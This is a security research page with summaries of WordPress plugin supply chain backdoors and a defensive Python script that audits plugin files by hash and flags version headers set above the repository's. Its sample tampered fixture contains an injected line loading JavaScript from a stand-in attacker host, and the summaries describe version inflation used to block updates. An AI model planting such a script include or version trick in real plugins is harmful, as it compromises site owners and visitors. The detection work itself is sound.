Security Research
-
A Sold WordPress Plugin, a Hidden Update Channel, and 20,000 Backdoored Sites
I know you’ve heard this before, but I’ve caught another plugin with a backdoor on wordpress.org. The plugin is Scroll To Top, slug scroll-top, with 20,000 active installs. The wordpress.org…
-
WordPress Plugin Hijacked in 2020 Hid a Dormant Backdoor for Years
Twelve sites in our fleet were running a tampered version 5.2.3 of Quick Page/Post Redirect Plugin. The file hash did not match anything on wordpress.org. The SVN log showed the plugin author committed the supply chain mechanism themselves.
-
Someone Bought 30 WordPress Plugins and Planted a Backdoor in All of Them
Last week, I wrote about catching a supply chain attack on a WordPress plugin called Widget Logic. A trusted name, acquired by a new owner, turned into something malicious. It…
-
How I Caught a WordPress Plugin Supply Chain Attack
A routine security alert led to uncovering a WordPress plugin supply chain attack. The Widget Logic plugin had changed hands, and the new owner used version number manipulation to inject external JavaScript while preventing auto-updates from delivering the fix.
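The two checks the summaries above lean on, as an added example that is not code from the original page, from Widget Logic, or from any of the plugins named: compare each installed plugin file against a hash manifest built from the matching wordpress.org release, and compare the installed Version header against the repo version, since WordPress only offers an update when the repo version is newer, so a tampered copy that claims a higher version quietly opts itself out of ever receiving the fix. The plugin slug `example-plugin`, its file contents, the reference manifest and the repo version are all constructed for the demo; the version ordering is a simplified numeric comparison, not PHP's full `version_compare` (which also understands suffixes such as `rc1`).

```python
"""Audit an installed WordPress plugin against a reference release.

Added example (not from the page or any plugin it describes). Assumes
you have already built REFERENCE_MANIFEST from the wordpress.org zip for
the version the plugin claims to be; here it is constructed inline.
"""
import hashlib
import re
from typing import Dict, List, Tuple

# Matches the "Version:" line inside a plugin's header comment block.
VERSION_RE = re.compile(r"^[ \t/*#@]*Version:[ \t]*(\S+)", re.IGNORECASE | re.MULTILINE)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def plugin_header_version(main_file: bytes) -> str:
    """Pull the Version: field from the plugin's main PHP file header."""
    m = VERSION_RE.search(main_file.decode("utf-8", errors="replace"))
    if not m:
        raise ValueError("no Version header found")
    return m.group(1)


def version_key(v: str) -> Tuple[int, ...]:
    """Simplified ordering: compare the numeric components only.
    (Assumption: suffixes like 'rc1' are ignored; PHP's version_compare
    treats them, but that is beyond this demo.)"""
    return tuple(int(p) for p in re.findall(r"\d+", v))


def audit_plugin(installed: Dict[str, bytes], reference: Dict[str, str],
                 repo_version: str, main_file: str) -> Dict[str, object]:
    """installed: path -> file bytes on disk.
    reference: path -> sha256 hex from the wordpress.org release zip.
    repo_version: the version wordpress.org currently serves."""
    hashes = {p: sha256_hex(b) for p, b in installed.items()}
    modified: List[str] = sorted(p for p in hashes if p in reference and hashes[p] != reference[p])
    added: List[str] = sorted(p for p in hashes if p not in reference)
    missing: List[str] = sorted(p for p in reference if p not in hashes)
    claimed = plugin_header_version(installed[main_file])
    # A claimed version above the repo's means the update check never
    # sees anything newer, so the tampered files stay in place.
    version_ahead = version_key(claimed) > version_key(repo_version)
    return {
        "claimed_version": claimed,
        "repo_version": repo_version,
        "modified": modified,
        "added": added,
        "missing": missing,
        "version_ahead_of_repo": version_ahead,
        "tampered": bool(modified or added),
    }


# --- Constructed sample data (hypothetical slug, not a real plugin) ---
CLEAN_MAIN = b"<?php\n/*\nPlugin Name: Example Plugin\nVersion: 1.4.0\n*/\n"
CLEAN_JS = b"console.log('ok');\n"
REPO_VERSION = "1.4.0"
REFERENCE_MANIFEST = {
    "example-plugin.php": sha256_hex(CLEAN_MAIN),
    "js/app.js": sha256_hex(CLEAN_JS),
}
CLEAN_INSTALL = {"example-plugin.php": CLEAN_MAIN, "js/app.js": CLEAN_JS}
# Tampered copy: bumped header version plus an injected external script.
TAMPERED_INSTALL = {
    "example-plugin.php": (
        b"<?php\n/*\nPlugin Name: Example Plugin\nVersion: 9.9.9\n*/\n"
        b"wp_enqueue_script('x', 'https://attacker.invalid/a.js');\n"
    ),
    "js/app.js": CLEAN_JS,
}

if __name__ == "__main__":
    for label, files in (("clean", CLEAN_INSTALL), ("tampered", TAMPERED_INSTALL)):
        report = audit_plugin(files, REFERENCE_MANIFEST, REPO_VERSION, "example-plugin.php")
        print(label, report)
```

On a real fleet the manifest comes from hashing the release zip for the version the plugin claims; a claimed version that does not exist on wordpress.org at all is itself a finding, and a file-level diff of the modified paths is the next step.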